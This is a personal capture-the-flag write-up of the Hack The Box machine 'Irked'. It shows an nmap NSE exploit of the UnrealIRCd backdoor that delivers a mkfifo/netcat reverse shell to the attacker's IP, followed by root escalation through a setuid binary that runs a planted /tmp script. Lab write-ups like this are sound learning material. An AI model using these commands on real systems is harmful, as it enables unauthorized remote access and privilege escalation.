HTB: Irked

Irked

Irked was next after Shocker; I went in blind.

Ports

This box had four unusual ports and no standard ports. We had:

6697/tcp open irc UnrealIRCd
8067/tcp open irc UnrealIRCd
46013/tcp open status 1 (RPC #100024)
65534/tcp open irc UnrealIRCd

So it’s pretty much just UnrealIRCd, whatever that is.

Whatever that is

According to wikipedia:

UnrealIRCd is an open-source IRC daemon, originally based on DreamForge, and is available for Unix-like operating systems and Windows.

The wikipedia entry also notes:

The tarball of version 3.2.8.1, from November 2009 to June 12, 2010, contained a trojan that allowed people to execute commands with the privileges of the user running the daemon, regardless of any user restrictions. The problem was fixed - the current tarball download is not suspected to contain a trojan.

Hmmmm. Googling for the exploit reveals an nmap script that could be useful. I try it with a ping:

nmap -d -p6697 --script=irc-unrealircd-backdoor.nse --script-args=irc-unrealircd-backdoor.command='ping 10.10.14.10' irked.htb

Success!

┌──(root💀kali)-[/opt/htb/irked]
└─# tcpdump -i tun0 icmp
tcpdump: verbose output suppressed, use -v[v]... for full protocol decode
listening on tun0, link-type RAW (Raw IP), snapshot length 262144 bytes
01:27:05.202341 IP 10.10.14.10 > irked.htb: ICMP echo request, id 54890, seq 0, length 8
01:27:05.202579 IP 10.10.14.10 > irked.htb: ICMP time stamp query id 37197 seq 0, length 20
01:27:05.443113 IP irked.htb > 10.10.14.10: ICMP echo reply, id 54890, seq 0, length 8
# etc

Now it’s just a matter of finding a shell payload that works. This one does:

nmap -d -p6697 --script=irc-unrealircd-backdoor.nse --script-args=irc-unrealircd-backdoor.command='rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 10.10.14.10 1234 >/tmp/f' irked.htb

But it’s the only one I could get to work.

Privesc

This was pretty easy (well, so was the foothold). Linpeas pointed out a binary, which I took a look at in Ghidra:

{
  puts("This application is being devleoped to set and test user permissions");
  puts("It is still being actively developed");
  system("who");
  setuid(0);
  system("/tmp/listusers");
  return 0;
}

Here’s the privesc; it’s just about easier to show it then write it out:

──(root💀kali)-[/opt/htb/irked]
└─# nc -nvlp 1234                                                                                                                                                             1 ⨯
listening on [any] 1234 ...
connect to [10.10.14.10] from (UNKNOWN) [10.10.10.117] 51835
/bin/sh: 0: can't access tty; job control turned off
$ python -c 'import pty;pty.spawn("/bin/bash");'
ircd@irked:~/Unreal3.2$ /usr/bin/viewuser
/usr/bin/viewuser
This application is being devleoped to set and test user permissions
It is still being actively developed
(unknown) :0           2021-03-14 05:02 (:0)
sh: 1: /tmp/listusers: not found
ircd@irked:~/Unreal3.2$ printf 'sh\n' >> /tmp/listusers
printf 'sh\n' >> /tmp/listusers
ircd@irked:~/Unreal3.2$ chmod +x /tmp/listusers 
chmod +x /tmp/listusers
ircd@irked:~/Unreal3.2$ /usr/bin/viewuser
/usr/bin/viewuser
This application is being devleoped to set and test user permissions
It is still being actively developed
(unknown) :0           2021-03-14 05:02 (:0)
# id;hostname
id;hostname
uid=0(root) gid=1001(ircd) groups=1001(ircd)
irked

Between this nmap script and another one I saw yesterday about enumerating wordpress plugins, there is more to NSE than I have been used to using.